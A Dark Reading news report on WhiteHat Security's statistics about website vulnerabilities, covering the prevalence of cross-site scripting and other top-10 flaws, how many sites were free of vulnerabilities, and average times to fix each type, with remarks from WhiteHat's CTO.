Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


02:49 PM
Connect Directly

Report: Cross-Site Scripting Still Most Common Web Vulnerability

New WhiteHat Security data shows vulnerability-free Websites start with half, but similar, bugs as sites riddled with bugs

WhiteHat Security's new Website security statistics released today came with a mostly unchanged list of the top 10 vulnerabilities -- cross-site scripting (XSS) is still king -- but also a peek at some characteristics of Websites that are free of vulnerabilities.

Among the 1,364 Websites scanned by WhiteHat and included in the report, 36 percent had no vulnerabilities at all, and 17 percent had never had a serious one. WhiteHat counted 1,800 vulnerabilities. But Jeremiah Grossman, founder and CTO of WhiteHat, says the real tidbit here is what types of bugs the clean sites had eradicated.

"What was striking was not the volume of zero-vulnerability Websites, but that this shows that those that have had vulns [in the past] were characteristically identical to those Websites that do have vulns today," Grossman says. The vulnerability-free sites had experienced the same issues as the bug-ridden ones, he says, demonstrating it is possible to sweep a site clean of vulnerabilities.

"They have the same set of issues," he says. There's nothing "magical" about their approach, Grossman adds, except they had made an effort to clean their sites, and that most had started with about half as many bugs as the ones that are still carrying vulnerabilities. The finding that the bugs were common across the board demonstrates how any Website has the risk of being compromised, according to the report.

Grossman says the data shows those who care about their Web application's security tend to have fewer bugs when they go into production. "This shows that it's then easier to get to zero over time," he says.

WhiteHat found that 83 percent of the Websites have had at least one serious vulnerability -- meaning either high, critical, or urgent as defined by PCI-DSS -- and 64 percent currently harbor at least one serious vulnerability. The average number of serious vulnerabilities per site is 16.7, and there's an average of 6.5 unresolved severe bugs in each Website, according to WhiteHat's findings. Social networking and education markets have the most serious vulnerabilities in their Websites, with 86 percent of social networking sites and 83 percent of education Websites harboring these flaws.

The top 10 vulnerabilities are XSS (66 percent); information leakage (49 percent); content spoofing (31 percent); insufficient authorization (19 percent); SQL injection (18 percent); predictable resource location (14 percent); cross-site request forgery (12 percent); session fixation (12 percent); HTTP response splitting (10 percent); and abuse of functionality (9 percent).

Grossman says SQL injection and CSRF are under-represented in the Top 10. SQL injection flaws can be difficult to detect in scans because developers who disable verbose error messages as a way to protect against SQL injection attack also inadvertently make it difficult to find SQL injection flaws, for instance. And even with this best practice in place, blind SQL injection attacks can still be waged on a Website, according to WhiteHat. CSRF, meanwhile, is notoriously difficult to detect.

On average, it takes 67 days to fix an XSS bug; 62 days for SQL injection; 93 days for CSRF; and 106 for session fixation, for example.

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message. Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
What the FedEx Logo Taught Me About Cybersecurity
Matt Shea, Head of Federal @ MixMode,  6/4/2021
A View From Inside a Deception
Sara Peters, Senior Editor at Dark Reading,  6/2/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
The State of Cybersecurity Incident Response
In this report learn how enterprises are building their incident response teams and processes, how they research potential compromises, how they respond to new breaches, and what tools and processes they use to remediate problems and improve their cyber defenses for the future.
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-06-13
The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP.
PUBLISHED: 2021-06-12
Receita Federal IRPF 2021 1.7 allows a man-in-the-middle attack against the update feature.
PUBLISHED: 2021-06-12
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
PUBLISHED: 2021-06-12
In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
PUBLISHED: 2021-06-12
It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-16 package apport hooks, it could expose private data to other local users.